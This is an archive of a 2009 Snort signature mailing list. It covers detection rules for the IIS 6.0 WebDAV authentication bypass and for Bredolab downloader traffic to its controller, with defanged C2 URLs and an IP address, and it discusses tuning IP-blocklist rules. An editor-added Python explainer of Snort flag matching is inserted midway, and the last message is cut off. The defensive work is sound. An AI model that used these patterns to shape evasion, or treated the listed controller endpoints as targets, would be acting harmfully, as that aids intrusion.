From: jgimer at gmail.com (Joshua Gimer)
Date: Tue, 19 May 2009 17:48:48 -0600
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To:
References:
Message-ID:

Here are some generic rules that I wrote:

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote Auth Bypass - GET METHOD"; pcre:"/GET.*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i"; reference:url,isc.sans.org/diary.html?storyid=6397; sid:1000004; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote Auth Bypass - PROPFIND METHOD"; pcre:"/PROPFIND.*%..%.*HTTP/Bi"; reference:url,isc.sans.org/diary.html?storyid=6397; sid:1000005; rev:1;)

There are probably better/more efficient ways of writing these, but thought that I would give it a shot.
Josh

On Sat, May 16, 2009 at 3:13 PM, Nick Randolph wrote:
> I'm submitting this for the recent IIS 6.0 vulnerability
> http://isc.sans.org/diary.html?storyid=6397
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af"; nocase; reference:url,isc.sans.org/diary.html?storyid=6397; sid:xxxxxx; gid:1; rev:1;)
>
> I also read that "translate: f" was required but the information on milw0rm.com did not use that in all 3 examples.
>

--
Thx
Joshua Gimer

From spooker at gmail.com Tue May 19 20:02:44 2009
From: spooker at gmail.com (Rodrigo Montoro(Sp0oKeR))
Date: Tue, 19 May 2009 21:02:44 -0300
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To:
References:
Message-ID: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>

http://vrt-sourcefire.blogspot.com/2009/05/snort-protection-against-iis-60-webdav.html

Regards,

On Tue, May 19, 2009 at 8:48 PM, Joshua Gimer wrote:
> Here are some generic rules that I wrote:
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote Auth Bypass - GET METHOD"; pcre:"/GET.*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i"; reference:url,isc.sans.org/diary.html?storyid=6397; sid:1000004; rev:1;)
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote Auth Bypass - PROPFIND METHOD"; pcre:"/PROPFIND.*%..%.*HTTP/Bi"; reference:url,isc.sans.org/diary.html?storyid=6397; sid:1000005; rev:1;)
>
> There are probably better/more efficient ways of writing these, but thought that I would give it a shot.
>
> Josh
>
> On Sat, May 16, 2009 at 3:13 PM, Nick Randolph wrote:
>> I'm submitting this for the recent IIS 6.0 vulnerability
>> http://isc.sans.org/diary.html?storyid=6397
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af"; nocase; reference:url,isc.sans.org/diary.html?storyid=6397; sid:xxxxxx; gid:1; rev:1;)
>>
>> I also read that "translate: f" was required but the information on milw0rm.com did not use that in all 3 examples.
>>
>
> --
> Thx
> Joshua Gimer
>

--
===========================
Rodrigo Montoro (Sp0oKeR)
http://www.spooker.com.br
http://www.snort.org.br
http://www.linkedin.com/in/spooker
===========================

From jgimer at gmail.com Tue May 19 20:20:13 2009
From: jgimer at gmail.com (Joshua Gimer)
Date: Tue, 19 May 2009 18:20:13 -0600
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
Message-ID:

Well that is good and all, but if you want something a little more specific in the alert msg here is a (minimally) optimized GET method rule:

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote Auth Bypass - GET METHOD"; content:"Translate:"; nocase; pcre:"/GET.*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i"; reference:url,isc.sans.org/diary.html?storyid=6397; sid:1000004; rev:1;)

On Tue, May 19, 2009 at 6:02 PM, Rodrigo Montoro(Sp0oKeR) wrote:
> http://vrt-sourcefire.blogspot.com/2009/05/snort-protection-against-iis-60-webdav.html
>
> Regards,
>
> On Tue, May 19, 2009 at 8:48 PM, Joshua Gimer wrote:
>> Here are some generic rules that I wrote:
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote Auth Bypass - GET METHOD"; pcre:"/GET.*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i"; reference:url,isc.sans.org/diary.html?storyid=6397; sid:1000004; rev:1;)
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote Auth Bypass - PROPFIND METHOD"; pcre:"/PROPFIND.*%..%.*HTTP/Bi"; reference:url,isc.sans.org/diary.html?storyid=6397; sid:1000005; rev:1;)
>>
>> There are probably better/more efficient ways of writing these, but thought that I would give it a shot.
>>
>> Josh
>>
>> On Sat, May 16, 2009 at 3:13 PM, Nick Randolph wrote:
>>> I'm submitting this for the recent IIS 6.0 vulnerability
>>> http://isc.sans.org/diary.html?storyid=6397
>>>
>>> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af"; nocase; reference:url,isc.sans.org/diary.html?storyid=6397; sid:xxxxxx; gid:1; rev:1;)
>>>
>>> I also read that "translate: f" was required but the information on milw0rm.com did not use that in all 3 examples.
>>
>> --
>> Thx
>> Joshua Gimer
>>
>
> --
> ===========================
> Rodrigo Montoro (Sp0oKeR)
> http://www.spooker.com.br
> http://www.snort.org.br
> http://www.linkedin.com/in/spooker
> ===========================
>

--
Thx
Joshua Gimer

From phatbuckett at gmail.com Tue May 19 21:28:52 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Tue, 19 May 2009 18:28:52 -0700
Subject: [Emerging-Sigs] BManager communication
In-Reply-To: <839aec700905130903j772857fcwdcf65406f5c881ef@mail.gmail.com>
References: <839aec700905130903j772857fcwdcf65406f5c881ef@mail.gmail.com>
Message-ID: <839aec700905191828n24bf7b28i15c275caeacc2f30@mail.gmail.com>

On Wed, May 13, 2009 at 9:03 AM, Darren Spruell wrote:
> Looks to be a downloader communicating with backend management kit, characteristic URLs:
>
> hXXp://websitecheck.cn/nr/controller.php?action=bot&entity_list=&uid=&first=1&guid=5421361321&rnd=874493
> hXXp://turokgame.cn/bm/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3858361321&rnd=923635
> hXXp://78.109.29.112/new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3970894049&rnd=981633
>
> Related (later stage)
>
> hXXp://78.109.29.112/new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1239013921:unique_start;1239013932:unique_start;1239013964:unique_start;1239022982:unique_start;1239024633:unique_start;1239875139:unique_start
>
> http://www.threatexpert.com/report.aspx?md5=ffe09f9b2470575727ea72bcb3ebce0a
>
> Microsoft calls it Bredolab, others some variant of Downloader.

The Bredolab naming seems to be taking it; BManager is apparently only the backend controller. MMPC reports Bredolab as responsible for dropping a number of other prevalent threats on victim hosts:

"Bredolab is notorious for installing prevalent spam bots such as Rustock, Cutwail, Srizbi, Tedroo and Rlsloup."

http://blogs.technet.com/mmpc/archive/2009/04/14/wheres-waledac.aspx

Updated rules:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bredolab Downloader Communicating With Controller (1)"; flow:established,to_server; uricontent:"action="; nocase; uricontent:"&entity_list="; nocase; uricontent:"&uid="; nocase; uricontent:"&first="; uricontent:"&guid="; nocase; uricontent:"&rnd="; nocase; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=TrojanDownloader:Win32/Bredolab.B; sid:XXXXXXX; rev:2;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bredolab Downloader Communicating With Controller (2)"; flow:established,to_server; uricontent:"action="; nocase; uricontent:"&guid="; nocase; uricontent:"&rnd="; nocase; uricontent:"&uid="; nocase; uricontent:"&entity="; nocase; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=TrojanDownloader:Win32/Bredolab.B; sid:XXXXXXX; rev:2;)

--
Darren Spruell
phatbuckett at gmail.com

From eoin.miller at trojanedbinaries.com Tue May 19 22:36:21 2009
From: eoin.miller at trojanedbinaries.com (Eoin Miller)
Date: Tue, 19 May 2009 22:36:21 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A13383B.1000608@jonkmans.com>
References: <4A131D81.3040907@jonkmans.com> <4A133285.1060104@trojanedbinaries.com> <4A13383B.1000608@jonkmans.com>
Message-ID: <4A136CA5.1080303@trojanedbinaries.com>

I would venture a guess that if you add the SYN flag, but don't reverse the direction of traffic flow in the rule, then you won't be triggering any alerts.
HOME ->SYN-> RBN
HOME <-SYN/ACK<- RBN
HOME ->ACK-> RBN

alert tcp [] any -> $HOME_NET any (flags: S;) = nothing
alert tcp $HOME_NET any -> [] any (flags: S;) = alert!

Setting the SYN flag is definitely where the optimization occurs. We compared the Snort rule stats, and the SYN rule was run far fewer times (only once per every new TCP connection attempted) instead of against every IP packet seen across the wire.

--
Eoin Miller
eoin.miller at trojanedbinaries.com

Matt Jonkman wrote:
> Very good point on the Syn flag. I've added that to all of the tcp sigs. That could alone be a good chunk of the performance gain I'd guess.
>
> On reversing the order, I agree there. I wish I'd originally made these sigs for home_net -> outside. But I'm hesitant to change it now as many folks have blocking built on the assumed hostile source.
>
> Matt
>
> Eoin Miller wrote:
>> Matt,
>>
>> In our testing/breakup/optimization of the IP List rules (RBN/BotCC/compromised/DShield), we did this a little differently for the TCP rules.
>>
>> Vanilla TCP rule (Example):
>> alert tcp [] any -> $HOME_NET any (msg:"ET RBN Known Russian Business Network IP TCP (1)"; reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork; threshold: type limit, track by_src, seconds 60, count 1; classtype:misc-attack; sid:2406000; rev:129;)
>>
>> Modified TCP rule (Example):
>> alert tcp $HOME_NET any -> [] any (flags: S; msg:"ET RBN Known Russian Business Network IP TCP (1)"; reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork; threshold: type limit, track by_src, seconds 60, count 1; classtype:misc-attack; sid:2406000; rev:129;)
>>
>> The modified rule looks for the TCP SYN flag to be set in addition to the $HOME_NET to be contacting the RBN's known IP's. This significantly decreases the processor load because Snort will only compare the SRC/DST address lists *if* the TCP SYN is set (or so it appears?).
>> When you have a large $HOME_NET, this appears to become even more important. Also, you may notice we flipped the flow of traffic from $HOME_NET to the RBN servers in our rule. This is because for us, we are monitoring NAT'd hosts behind firewalls and are concerned more with our internal hosts reaching out and attempting to establish a TCP session to potentially dangerous sites that are doing drive by/malware hosting/phishing or reaching out to potential C&C servers hosted by RBN. We are less concerned with RBN sites attempting to connect in and create TCP sessions to our clients' desktop systems as they are NAT'd behind a firewall.
>>
>> We also created an additional rule set to cover ICMP communications just to keep tabs if anything starts communicating over it for some reason. Again, please note that the SRC/DST have been flipped:
>>
>> New ICMP rule (Example):
>> alert icmp $HOME_NET -> [] (msg:"ET RBN Known Russian Business Network IP ICMP (1)"; reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork; threshold: type limit, track by_src, seconds 60, count 1; classtype:misc-attack; sid:2406000; rev:129;)
>>
>> We benchmarked the old RBN ruleset (which used "alert ip" type rules) against the new one we created (using "alert tcp" w/TCP SYN flag and "alert udp") using a 25GB pcap traffic capture.
>>
>> Rule Types    | Time To Process 25GB of PCAP
>> ----------------------------------------------
>> alert ip      = 1 hour, 3 minutes, 4 seconds
>> alert tcp/udp = 11 minutes, 43 seconds
>>
>> Additionally, the disk could not shove packets fast enough at Snort to process the alert tcp/udp rule sets. The Snort instance only ran at about 75% processor utilization during its super short 11 minutes of processing. The processor was pegged at 100% during the alert ip rules which took 1 hour.
>> At our client site, we used to have to break up the RBN rule list into two separate rule lists/instances of Snort just to monitor a 300MBit/s link without dropping packets in Snort (compiled against MMAP LibPcap). This was for the RBN list ONLY. Now we can run almost all of the IP list rules on a single processor core/instance of Snort @ 300MBit/s without dropping even 0.01% of packets.
>>
>> It should be noted we are not running Snort in-line and these sigs should really be for people running in purely IDS mode. Marty's new super sweet IP BlackList preproc seems to be the way to go for you that are running in-line.
>>
>> --
>> Eoin Miller
>> eoin.miller at trojanedbinaries.com
>

From frank at knobbe.us Tue May 19 23:01:14 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Tue, 19 May 2009 22:01:14 -0500
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A136CA5.1080303@trojanedbinaries.com>
References: <4A131D81.3040907@jonkmans.com> <4A133285.1060104@trojanedbinaries.com> <4A13383B.1000608@jonkmans.com> <4A136CA5.1080303@trojanedbinaries.com>
Message-ID: <20090520030114.GA42575@knobbe.us>

On Tue, May 19, 2009 at 10:36:21PM -0400, Eoin Miller wrote:
> alert tcp [] any -> $HOME_NET any (flags: S;) = nothing
> alert tcp $HOME_NET any -> [] any (flags: S;) = alert!

If you do that, use "flags:S,12;" to avoid accidental evasion if reserved bits are set.

Cheers,
Frank

From pepperjack at afferentsecurity.com Wed May 20 09:08:30 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Wed, 20 May 2009 08:08:30 -0500
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A13383B.1000608@jonkmans.com>
References: <4A131D81.3040907@jonkmans.com> <4A133285.1060104@trojanedbinaries.com> <4A13383B.1000608@jonkmans.com>
Message-ID: <20090520080830.ifu18qi4qoscosgc@mail.afferentsecurity.com>

Quoting Matt Jonkman :

> On reversing the order, I agree there. I wish I'd originally made these sigs for home_net -> outside. But I'm hesitant to change it now as many folks have blocking built on the assumed hostile source.

yeah, definitely. If you change the direction, it should definitely be a new SID range, and probably a new filename, because of how oinkmaster edits work.

tc

--
Framework? I don't need no stinking framework!
----------------------------------------------------------------
@fferent Security Labs: Isolate/Insulate/Innovate
http://www.afferentsecurity.com

From spooker at gmail.com Wed May 20 09:52:12 2009
From: spooker at gmail.com (Rodrigo Montoro(Sp0oKeR))
Date: Wed, 20 May 2009 10:52:12 -0300
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <20090520080830.ifu18qi4qoscosgc@mail.afferentsecurity.com>
References: <4A131D81.3040907@jonkmans.com> <4A133285.1060104@trojanedbinaries.com> <4A13383B.1000608@jonkmans.com> <20090520080830.ifu18qi4qoscosgc@mail.afferentsecurity.com>
Message-ID: <9255886c0905200652w5283f10r31d97e0d4df3fca3@mail.gmail.com>

Using only SYN, isn't it easy to create a lot of FPs using spoofed packets? I didn't test ipblacklist from Roesch yet, but one of the points was the possibility of creating spoofed packets with only the SYN flag set and creating a lot of FPs.

On Wed, May 20, 2009 at 10:08 AM, Jack Pepper wrote:
> Quoting Matt Jonkman :
>
>> On reversing the order, I agree there. I wish I'd originally made these sigs for home_net -> outside. But I'm hesitant to change it now as many folks have blocking built on the assumed hostile source.
>
> yeah, definitely. If you change the direction, it should definitely be a new SID range, and probably a new filename, because of how oinkmaster edits work.
>
> tc
>
> --
>
> Framework? I don't need no stinking framework!
>
> ----------------------------------------------------------------
> @fferent Security Labs: Isolate/Insulate/Innovate
> http://www.afferentsecurity.com
>

--
===========================
Rodrigo Montoro (Sp0oKeR)
http://www.spooker.com.br
http://www.snort.org.br
http://www.linkedin.com/in/spooker
===========================

From jonkman at jonkmans.com Wed May 20 12:18:38 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 20 May 2009 12:18:38 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <20090520030114.GA42575@knobbe.us>
References: <4A131D81.3040907@jonkmans.com> <4A133285.1060104@trojanedbinaries.com> <4A13383B.1000608@jonkmans.com> <4A136CA5.1080303@trojanedbinaries.com> <20090520030114.GA42575@knobbe.us>
Message-ID: <4A142D5E.4050201@jonkmans.com>

What if, ignoring the reversing homenet/extnet thing, we just go with flow:established on the tcp sigs and make it directionless?

That'll eliminate a lot of the noise and only give you an alert when you have a box talking to them.

Then we don't need to open a new sid range or reverse the directions, so no one has to redo blocking/response rules.

Matt

Frank Knobbe wrote:
> On Tue, May 19, 2009 at 10:36:21PM -0400, Eoin Miller wrote:
>> alert tcp [] any -> $HOME_NET any (flags: S;) = nothing
>> alert tcp $HOME_NET any -> [] any (flags: S;) = alert!
>
> If you do that, use "flags:S,12;" to avoid accidental evasion if reserved bits are set.
>
> Cheers,
> Frank
>

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com Wed May 20 12:24:58 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 20 May 2009 12:24:58 -0400
Subject: [Emerging-Sigs] BManager communication
In-Reply-To: <839aec700905191828n24bf7b28i15c275caeacc2f30@mail.gmail.com>
References: <839aec700905130903j772857fcwdcf65406f5c881ef@mail.gmail.com> <839aec700905191828n24bf7b28i15c275caeacc2f30@mail.gmail.com>
Message-ID: <4A142EDA.9050505@jonkmans.com>

Posting now, thanks Darren! Great research.

Matt

Darren Spruell wrote:
> On Wed, May 13, 2009 at 9:03 AM, Darren Spruell wrote:
>> Looks to be a downloader communicating with backend management kit, characteristic URLs:
>>
>> hXXp://websitecheck.cn/nr/controller.php?action=bot&entity_list=&uid=&first=1&guid=5421361321&rnd=874493
>> hXXp://turokgame.cn/bm/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3858361321&rnd=923635
>> hXXp://78.109.29.112/new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3970894049&rnd=981633
>>
>> Related (later stage)
>>
>> hXXp://78.109.29.112/new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1239013921:unique_start;1239013932:unique_start;1239013964:unique_start;1239022982:unique_start;1239024633:unique_start;1239875139:unique_start
>>
>> http://www.threatexpert.com/report.aspx?md5=ffe09f9b2470575727ea72bcb3ebce0a
>>
>> Microsoft calls it Bredolab, others some variant of Downloader.
>
> The Bredolab naming seems to be taking it; BManager is apparently only the backend controller.
> MMPC reports Bredolab as responsible for dropping a number of other prevalent threats on victim hosts:
>
> "Bredolab is notorious for installing prevalent spam bots such as Rustock, Cutwail, Srizbi, Tedroo and Rlsloup."
>
> http://blogs.technet.com/mmpc/archive/2009/04/14/wheres-waledac.aspx
>
> Updated rules:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bredolab Downloader Communicating With Controller (1)"; flow:established,to_server; uricontent:"action="; nocase; uricontent:"&entity_list="; nocase; uricontent:"&uid="; nocase; uricontent:"&first="; uricontent:"&guid="; nocase; uricontent:"&rnd="; nocase; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=TrojanDownloader:Win32/Bredolab.B; sid:XXXXXXX; rev:2;)
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bredolab Downloader Communicating With Controller (2)"; flow:established,to_server; uricontent:"action="; nocase; uricontent:"&guid="; nocase; uricontent:"&rnd="; nocase; uricontent:"&uid="; nocase; uricontent:"&entity="; nocase; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=TrojanDownloader:Win32/Bredolab.B; sid:XXXXXXX; rev:2;)
>

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From eoin.miller at trojanedbinaries.com Wed May 20 13:47:02 2009
From: eoin.miller at trojanedbinaries.com (Eoin Miller)
Date: Wed, 20 May 2009 13:47:02 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A142D5E.4050201@jonkmans.com>
References: <4A131D81.3040907@jonkmans.com> <4A133285.1060104@trojanedbinaries.com> <4A13383B.1000608@jonkmans.com> <4A136CA5.1080303@trojanedbinaries.com> <20090520030114.GA42575@knobbe.us> <4A142D5E.4050201@jonkmans.com>
Message-ID: <4A144216.6020804@trojanedbinaries.com>

Matt,

I am trying that out right now, and it doesn't help the performance. I am seeing about 60-70% packet loss using only the RBN rules on the ~250mbit link. Using flow:established still requires the rules to be triggered and processed for every single TCP packet that flows across the wire.

--
Eoin Miller

Matt Jonkman wrote:
> What if, ignoring the reversing homenet/extnet thing, we just go with flow:established on the tcp sigs and make it directionless?
>
> That'll eliminate a lot of the noise and only give you an alert when you have a box talking to them.
>
> Then we don't need to open a new sid range or reverse the directions, so no one has to redo blocking/response rules.
>
> Matt
>
> Frank Knobbe wrote:
>
>> On Tue, May 19, 2009 at 10:36:21PM -0400, Eoin Miller wrote:
>>
>>> alert tcp [] any -> $HOME_NET any (flags: S;) = nothing
>>> alert tcp $HOME_NET any -> [] any (flags: S;) = alert!
>>>
>> If you do that, use "flags:S,12;" to avoid accidental evasion if reserved bits are set.
>>
>> Cheers,
>> Frank
>>
>

From wkitty42 at windstream.net Wed May 20 14:34:13 2009
From: wkitty42 at windstream.net (waldo kitty)
Date: Wed, 20 May 2009 14:34:13 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <20090520080830.ifu18qi4qoscosgc@mail.afferentsecurity.com>
References: <4A131D81.3040907@jonkmans.com> <4A133285.1060104@trojanedbinaries.com> <4A13383B.1000608@jonkmans.com> <20090520080830.ifu18qi4qoscosgc@mail.afferentsecurity.com>
Message-ID: <4A144D25.8040302@windstream.net>

Jack Pepper wrote:
> Quoting Matt Jonkman :
>
>> On reversing the order, I agree there. I wish I'd originally made these sigs for home_net -> outside. But I'm hesitant to change it now as many folks have blocking built on the assumed hostile source.
>
> yeah, definitely. If you change the direction, it should definitely be a new SID range, and probably a new filename, because of how oinkmaster edits work.

not only that but also, as already mentioned, some folk already have blocking plans in place using the existing format... we use a blanket drop on any traffic from any RBN addresses in the list so it doesn't matter, as far as we are concerned, if the traffic originated from inside our network or not... we do, however, want to find that machine that initiated that connection and give it a swift kick if/when needed so the "flipside" rules are also welcome ;)

--
_\/ (@@)                          Waldo Kitty, Waldo's Place USA
__ooO_( )_Ooo_____________________ telnet://bbs.wpusa.dynip.com
_|_____|_____|_____|_____|_____|_____ http://www.wpusa.dynip.com
____|_____|_____|_____|_____|_____|____ ftp://ftp.wpusa.dynip.com
_|_Eat_SPAM_to_email_me!_YUM!__|_____ wkitty42 -at- windstream.net

From frank at knobbe.us Wed May 20 20:15:52 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 20 May 2009 19:15:52 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
Message-ID: <1242864952.97653.19.camel@localhost>

On Tue, 2009-05-19 at 21:02 -0300, Rodrigo Montoro(Sp0oKeR) wrote:
> http://vrt-sourcefire.blogspot.com/2009/05/snort-protection-against-iis-60-webdav.html

You mean
http://vrt-sourcefire.blogspot.com/2009/05/rules-to-detect-iis-60-webdav-exploit.html ? :)

Frank

--
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.
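Back to the IP List rulesets thread above: Frank Knobbe's advice to write "flags:S,12;" rather than "flags:S;" on Eoin Miller's SYN-only rules is worth seeing concretely. The following is an editor-added example, not code posted to the list and not Snort's own implementation; it re-implements the semantics of Snort's flags option (exact match on the whole flags byte unless the bits named after the comma are masked out) and checks both variants against three constructed TCP headers, including a SYN that also carries the two reserved bits, the case Frank calls accidental evasion.

```python
"""Snort 'flags' option semantics: why flags:S,12 instead of flags:S.

Added example, not code from the thread. Snort's flag letters are
F=FIN S=SYN R=RST P=PSH A=ACK U=URG, and the digits 1 and 2 name the two
"reserved" bits at the top of the TCP flags byte (0x80 and 0x40, used as
CWR and ECE by ECN, RFC 3168). A bare "flags:S" compares the whole byte,
so a SYN that also carries either reserved bit does not match;
"flags:S,12" masks those two bits out before the comparison.
"""
import struct

FLAG_BITS = {
    "F": 0x01, "S": 0x02, "R": 0x04, "P": 0x08,
    "A": 0x10, "U": 0x20, "2": 0x40, "1": 0x80,
}


def parse_flags_option(spec):
    """Parse the argument of a Snort 'flags' option, e.g. "S", "S,12", "+SA".

    Returns (modifier, wanted_bits, ignore_mask); modifier is "" (exact),
    "+" (all of these, others allowed), "*" (any of these) or "!" (none).
    """
    spec = spec.replace(" ", "")
    flags, _, ignored = spec.partition(",")
    modifier = ""
    if flags and flags[0] in "+*!":
        modifier, flags = flags[0], flags[1:]
    wanted = sum(FLAG_BITS[c] for c in flags)
    ignore_mask = sum(FLAG_BITS[c] for c in ignored)
    return modifier, wanted, ignore_mask


def flags_match(spec, tcp_flags):
    """Evaluate a 'flags' option against a TCP flags byte."""
    modifier, wanted, ignore_mask = parse_flags_option(spec)
    seen = tcp_flags & 0xFF & ~ignore_mask   # drop the bits listed after the comma
    if modifier == "":
        return seen == wanted
    if modifier == "+":
        return seen & wanted == wanted
    if modifier == "*":
        return seen & wanted != 0
    return seen & wanted == 0                 # "!"


def build_tcp_header(sport, dport, flags):
    """Minimal 20-byte TCP header (seq/ack/checksum zero): constructed test data."""
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 65535, 0, 0)


def tcp_flags_from_segment(segment):
    """The flags byte sits at offset 13 of the TCP header."""
    return segment[13]


# Constructed segments. The second is a SYN with both reserved bits set, which is
# what an ECN-setup SYN looks like and also the evasion case the thread refers to.
SAMPLE_SEGMENTS = [
    ("plain SYN", build_tcp_header(40000, 80, FLAG_BITS["S"])),
    ("SYN with reserved bits 1+2", build_tcp_header(
        40001, 80, FLAG_BITS["S"] | FLAG_BITS["1"] | FLAG_BITS["2"])),
    ("SYN/ACK", build_tcp_header(80, 40000, FLAG_BITS["S"] | FLAG_BITS["A"])),
]


def evaluate_syn_rules(segments=SAMPLE_SEGMENTS):
    """Apply both rule variants to each segment.

    Returns a list of (label, matches "flags:S", matches "flags:S,12").
    """
    results = []
    for label, seg in segments:
        bits = tcp_flags_from_segment(seg)
        results.append((label, flags_match("S", bits), flags_match("S,12", bits)))
    return results


if __name__ == "__main__":
    for label, plain, masked in evaluate_syn_rules():
        print(f"{label:28s} flags:S -> {plain!s:5s}  flags:S,12 -> {masked}")
```

The plain SYN matches both variants and the SYN/ACK matches neither, but the SYN carrying the reserved bits only matches "flags:S,12": with the bare "flags:S" that connection attempt to a listed address would never raise an alert, which is exactly the gap the masked form closes.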
From frank at knobbe.us Wed May 20 20:30:46 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 20 May 2009 19:30:46 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To:
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
Message-ID: <1242865846.97653.27.camel@localhost>

On Tue, 2009-05-19 at 18:20 -0600, Joshua Gimer wrote:
> Well that is good and all, but if you want something a little more specific in the alert msg here is a (minimally) optimized GET method rule:
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote Auth Bypass - GET METHOD"; content:"Translate:"; nocase; pcre:"/GET.*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i"; reference:url,isc.sans.org/diary.html?storyid=6397; sid:1000004; rev:1;)

Not like that :)

Add a " content:"GET "; depth:4; " to the beginning to help performance. The colons in the content and pcre match are not escaped. Are you sure the second pcre is necessary?

How about:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"CURRENT_EVENTS IIS6.0 WebDav RemoteAuth Bypass - GET METHOD"; flow:to_server,established; content:"GET "; depth:4; content:"Translate|3a| f"; nocase; pcre:"/GET.*%..%.*HTTP/Bi"; classtype:web-application-attack; reference:url,isc.sans.org/diary.html?storyid=6397; sid:xxxxxxxx; rev:1;)

And of course one for POST, HEAD, and perhaps COPY, MOVE and DAV?

-Frank

From eslerj at gmail.com Wed May 20 20:41:09 2009
From: eslerj at gmail.com (Joel Esler)
Date: Wed, 20 May 2009 20:41:09 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242865846.97653.27.camel@localhost>
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost>
Message-ID: <314cf0830905201741o1b211c70o526e196017745a3d@mail.gmail.com>

On Wed, May 20, 2009 at 8:30 PM, Frank Knobbe wrote:
> On Tue, 2009-05-19 at 18:20 -0600, Joshua Gimer wrote:
> > Well that is good and all, but if you want something a little more specific in the alert msg here is a (minimally) optimized GET method rule:
> >
> > alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote Auth Bypass - GET METHOD"; content:"Translate:"; nocase; pcre:"/GET.*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i"; reference:url,isc.sans.org/diary.html?storyid=6397; sid:1000004; rev:1;)
>
> Not like that :)
>
> Add a " content:"GET "; depth:4; " to the beginning to help performance. The colons in the content and pcre match are not escaped. Are you sure the second pcre is necessary?
>
> How about:
>
